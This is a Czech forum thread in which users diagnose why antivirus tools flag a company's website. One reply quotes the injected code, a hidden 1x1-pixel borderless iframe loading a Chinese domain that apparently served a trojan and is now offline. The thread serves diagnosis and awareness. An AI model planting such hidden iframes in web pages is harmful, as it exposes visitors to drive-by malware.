Hojte. Stryk pracuje ve firmě, a jejich stránka je http://www.betochem.cz. Když jsem na tu stránku najel na svojem kompu, kde mám NOD 32, tak mi to neudělalo nic, a na stránku jsem se dostal, až Chrome mi vyhodil chybu. Na mamčiném kde je Avast, vyhodil chybu on, a dál mě nepustil. Mohli by jste mi něco o tom říct co se tam dějě? Zjistil jsem že je tam iframe na nějakou cizí stránku, ale když jsem si jí dal do adresy tak ji to nenašlo.
Díky za každou poznámku
Malware na stránce-NOD nic
- arxeiss
- Začátečník

- Kontaktovat uživatele:
Malware na stránce-NOD nic
PC : CPU: C2D E5200 2500Mhz @ 3750Mhz a AC Freezer 7PRO MB: Gigabyte GA-P31-DS3L rev.2,1 GPU: ATI Radeon 3650HD 256MB RAM: A-Data Vitesta 2x2GB Zdroj: Forton OEM 400W HDD: Samsung F2 500GB
Netbook : Asus EEE CPU: Intel Atom N270 1,6GHz RAM: A-Data 2GB HDD: 250GB 5400ot/min
Netbook : Asus EEE CPU: Intel Atom N270 1,6GHz RAM: A-Data 2GB HDD: 250GB 5400ot/min
- xxsawer
- Začátečník

-
Re: Malware na stránce-NOD nic
Hezký
Řek bych, že v kámošově firmě jim někdo vyhackoval webovky a hezky nenápadně
Ten iframe o kterym mluvíš je tohle:
Neni divu, že ho nevidíš protože má nastavenej nulovej rámeček a rozměry 1x1 pixel a načítá (nebo spíš načítala) se do něj nějaká čínská stránka pravděpodobně s nějakym trojanem, která je už teď odstavená...Jinak ten iframe se načítá úplně dolů do toho šedýho pruhu.
Stačí si dát na googlu vyhledat "NtKrnlpa" a odkazy se jenom hrnou - většinou to sou právě logy z hijackthis...
Jestli tě avast ani chrome dál nepustí tak je to tim, že už mají v databázi tenhle server jako útočnej nebo něco podobnýho.
NOD byl vždycky shit, ale třeba nemáš jenom updatovanou databázi
Řek bych, že v kámošově firmě jim někdo vyhackoval webovky a hezky nenápadně
Ten iframe o kterym mluvíš je tohle:
Kód: Vybrat vše
<iframe src="http://NtKrnlpa.cn/rc/" style="border: 0pt none ;" height="1" width="1"></iframe>Stačí si dát na googlu vyhledat "NtKrnlpa" a odkazy se jenom hrnou - většinou to sou právě logy z hijackthis...
Jestli tě avast ani chrome dál nepustí tak je to tim, že už mají v databázi tenhle server jako útočnej nebo něco podobnýho.
NOD byl vždycky shit, ale třeba nemáš jenom updatovanou databázi
- arxeiss
- Začátečník

- Kontaktovat uživatele:
No vím, na ten iframe jsem se díval, a dával jsem si tu stránku do googlu, a hrnuly se odkazy, ale ta stránka už neexistuje. A proč si myslíš že NOD je šit?
PC : CPU: C2D E5200 2500Mhz @ 3750Mhz a AC Freezer 7PRO MB: Gigabyte GA-P31-DS3L rev.2,1 GPU: ATI Radeon 3650HD 256MB RAM: A-Data Vitesta 2x2GB Zdroj: Forton OEM 400W HDD: Samsung F2 500GB
- xxsawer
- Začátečník

-
No vzdyt jsem psal, ze uz je stranka odstavena...
S NODem mam jenom spatny zkusenosti, takze sem ho poslal do kytek
S NODem mam jenom spatny zkusenosti, takze sem ho poslal do kytek